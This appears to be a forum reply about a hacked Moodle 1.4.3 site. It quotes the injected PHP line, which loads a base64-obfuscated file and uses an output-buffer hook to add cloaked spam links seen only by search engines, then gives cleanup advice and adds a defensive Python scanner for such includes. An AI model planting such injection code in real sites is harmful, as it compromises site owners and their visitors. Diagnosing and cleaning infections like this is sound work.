Hi There,
1.4.3 is really old and the site has been hacked - that initial group of lines:
ob_start(); include_once base64_decode("L2hvbWUvbnl0ZWdsb3IvcHVibGljX2h0bWwvc2Nob29sL2xhbmcvdHIvaGVscC9xdWl6L2hlbHBjbGFzcy50eHQ="); $_SERVER["php__ss_ldata"]=ob_get_clean(); ob_start("php__session_end");function php__session_end($php__buffer){if(!eregi("[a-z]",$_SERVER["php__ss_ldata"])) return $php__buffer; if(function_exists("php__register_global")) $php__buffer=php__register_global($php__buffer);return eregi("",$php__buffer)?preg_replace("||i","{$_SERVER["php__ss_ldata"]}",$php__buffer):$php__buffer.$_SERVER["php__ss_ldata"]; }
is trying to put stacks of viagra links on the page (and only for search engines visiting your site - not for general visitors).
I'd suggest you delete the moodle directory completely and replace it with a copy of Moodle 1.5Stable (this link here should work)
http://download.moodle.org/download.php/stable15/moodle-latest-15.zip
Hopefully the upgrade works OK.
Then I would try to take individual course backups of each course and build a fresh copy of Moodle (latest 1.9Stable) and then restore each individual course on the new site. You will probably want your client to check the content, as it's possible the hackers/spammers have modified the content of your site.
You should also check to make sure none of the other sites on your server have been compromised. If your server is configured badly - it's possible one of your other sites infected the Moodle install in the first place.
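
One way to check the other sites on the server, as an added example that is not part of the original post: it scans PHP files for an include whose argument is base64_decode of a string literal, the pattern in the injected line quoted above, and reports the decoded path. The function names and the sample path are made up for illustration.

```python
import base64
import binascii
import re
from pathlib import Path

# include/require (optionally _once) whose argument is base64_decode("<literal>")
PATTERN = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=]+)\1""",
    re.IGNORECASE,
)

def find_encoded_includes(php_source):
    """Return the decoded argument of every include(base64_decode("...")) found."""
    decoded = []
    for match in PATTERN.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(2), validate=True)
        except (binascii.Error, ValueError):
            continue  # literal is not valid base64, skip it
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def scan_tree(root, suffixes=(".php", ".inc", ".html")):
    """Map each file under root that contains the pattern to its decoded targets."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file, skip it
        targets = find_encoded_includes(text)
        if targets:
            hits[str(path)] = targets
    return hits

# Constructed sample: same shape as the injected line, with a made-up path.
SAMPLE = ('<?php ob_start(); include_once base64_decode("'
          + base64.b64encode(b"/tmp/example/helpclass.txt").decode()
          + '"); ?>')

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for file, targets in sorted(scan_tree(root).items()):
        print(file, "->", targets)
```

Run it with the web root of each site as the argument; every decoded path it prints is a file to inspect as well, since that is where the injected content is loaded from.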